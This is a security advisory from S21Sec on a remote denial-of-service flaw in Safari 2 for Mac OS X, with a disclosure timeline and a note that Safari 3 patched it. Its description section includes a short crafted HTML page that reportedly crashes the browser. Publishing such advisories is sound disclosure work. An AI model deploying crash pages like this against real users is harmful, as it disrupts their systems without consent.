Safari 2 Denial of Service

2008-01-15T00:00:00
ID SECURITYVULNS:DOC:18857
Type securityvulns
Reporter Securityvulns
Modified 2008-01-15T00:00:00

Description

                 - S21Sec Advisory -
Title:  Safari 2 Denial of Service
   ID:  S21SEC-039-en

Severity: Medium - Remote DoS History: 15.Jul.2007 Vulnerability discovered 22.Jul.2007 Vendor contacted 27.Jul.2007 Vendor confirmed the vulnerability 26.Oct.2007 Safari 3 in Leopard 14.Nov.2007 Safari 3 in Tiger

Scope:  Remote Denial of Service

Platforms: MacOSX Author: David Barroso (dbarroso@s21sec.com) URL: http://www.s21sec.com/avisos/s21sec-039-en.txt Release: Public

[ SUMMARY ]

According to Wikipedia, Safari is a web browser developed by Apple Inc. and included in Mac OS X. It was first released as a public beta on January 7, 2003, as the default browser in Mac OS X v10.3. A beta version for Microsoft Windows was released for the first time on June 11, 2007 with support for Windows XP and Windows Vista

[ AFFECTED VERSIONS ]

Following versions are affected with this issue:

- Safari Version 2 (MacOSX Version)

[ DESCRIPTION ]

A crafted HTML page can make Safari crash when trying to parse the page due to an unproper validation in the KHTML Webkit. Example:

<html> <head> <title>Safari Exploit</title> </head> <body>

<form> <div id="foo" style="display:none;"> <table> <tr> <td></td> </tr> </table> </div> <input type="text" /> </form> </body> </html>

[ WORKAROUND ]

The vulnerability was patched in Safari 3, officially released on October, 2007 (Leopard) and November, 2007 (Tiger).

[ ACKNOWLEDGMENTS ]

This vulnerability have been found and researched by:

- David Barroso &lt;dbarroso@s21sec.com&gt; S21sec labs

[ REFERENCES ]

  • Wikipedia. Safari http://en.wikipedia.org/wiki/Safari_%28web_browser%29

  • Safari http://www.apple.com/safari/

  • S21Sec http://www.s21sec.com

  • Blog S21sec http://blog.s21sec.com